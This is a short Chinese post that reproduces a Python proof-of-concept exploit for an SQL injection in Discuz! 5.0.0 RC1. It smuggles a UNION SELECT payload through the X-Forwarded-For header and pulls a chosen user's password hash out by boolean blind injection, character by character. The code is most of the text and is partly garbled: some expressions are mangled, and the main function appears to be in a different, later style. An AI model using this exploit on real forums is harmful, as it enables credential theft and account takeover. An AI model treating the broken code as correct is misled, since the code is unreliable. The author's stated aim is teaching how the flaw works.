这里把网上公布的 code 也贴出来(该 PoC 把 SQL 注入载荷放在 X-Forwarded-For 头里,对指定 uid 的密码 hash 逐位比较 ascii 值,以布尔盲注的方式把 hash 取出来):

#!/usr/bin/python
#
# Discuz! 5.0.0 RC1 SQL injection PoC
#
# Author: wofeiwo thx superheis help
#
# Date: Aug 12th 2006

import sys 
import httplib
from urlparse import urlparse
from time import sleep


def  injection (lenthofpass, realurl, path):
    sys.stdout.write(
'[+] The uid=' + sys.argv[2+ ' password hash is: ')
    
for num in range(1,lenthofpass+1):
        ran 
= range(97123)
        
for a in range(4858): ran.append(a)

        
for i in ran:
    
            query 
= '</span>' union select 122,122,122,122,122,122,122,122 from cdb_members where uid=' + sys.argv[2] + ' AND ascii(substring(CONCAT(password),' + str(num) + ',1))=' + str(i) + ' /*'
            header = {'Accept':'image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*','Referer':'http://' + realurl[1+ path + 'logging.php?action=login','Accept-Language':'zh-cn','Content-Type':'application/x-www-form-urlencoded','User-Agent':'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon)','Connection':'Keep-Alive','Cache-Control':'no-cache','X-Forwarded-For':query,'Cookie':'cdb_sid=70KRjS; cdb_cookietime=2592000'}
            data 
= "formhash=6a49b97f&referer=discuz.php&loginmode=&styleid=&cookietime=2592000&loginfield=username&username=test&password=123456789&questionid=0&answer=&loginsubmit=%E6%8F%90+%C2%A0+%E4%BA%A4"
            
#print header
            #sys.exit(1)
            http = httplib.HTTPConnection(realurl[1])
            http.request(
"POST", path + "logging.php?action=login&",data , header)
            
#sleep(1)
            response = http.getresponse()
            re1 
= response.read()
            
if re1.find('SELECT'== -1:
                
print '\n[-] Unvulnerable host'
                
print '[-] Exit..'
                sys.exit(
1);
    
            
elif re1.find('ip3'== -1:
                sys.stdout.write(chr(i))
                http.close()
                
#sleep(1)
                break
            
            
#print re1
            #print '-----------------------------------------------'
            http.close()
            
#sleep(1)
    sys.stdout.write('\n')

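def main():
    """Parse ``<url> <uid>`` from argv, normalise the forum path, run injection().

    Exits with status 0 and a usage message when the arguments are missing or
    uid is not numeric (uid is interpolated unquoted into the SQL payload).
    """
    print('Discuz! 5.0.0 RC1 SQL injection exploit')
    print('Codz by wofeiwo wofeiwo[0x40]gmail[0x2C]com\n')

    if len(sys.argv) != 3 or not sys.argv[2].isdigit():
        print("Usage: %s <url> <uid>" % sys.argv[0])
        print("Example: %s http://127.0.0.1/dz/ 1" % sys.argv[0])
        sys.exit(0)

    url = urlparse(sys.argv[1])
    # Forum root path with a trailing slash.  An empty path (http://host with
    # nothing after it) used to raise IndexError on url[2][-1].
    base = url[2]
    if not base.endswith('/'):
        base += '/'

    lenth = 32  # length of an MD5 hex digest
    print('[+] Connect %s' % url[1])
    print('[+] Trying')
    print('[+] Plz wait a long long time')

    injection(lenth, url, base)

    print('[+] Finished')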


# Script entry point; importing the module does not start the attack.
if __name__ == '__main__':
    main()


btw: 我一直认为,0day 不是最重要的,重要的是懂得其原理。
我写的这个 code 就像 PoC 的字面意思一样,只不过是个证明而已,所以也没必要写成最优代码。这个 code 我只在本地测试过,远程测试不成功是很正常的(比如 formhash、cdb_sid 这些值都是直接写死的)。当然,如果懂了原理,写个能用的 exploit 还是很方便的;否则连为什么不成功都不清不楚,也只有郁闷着了。
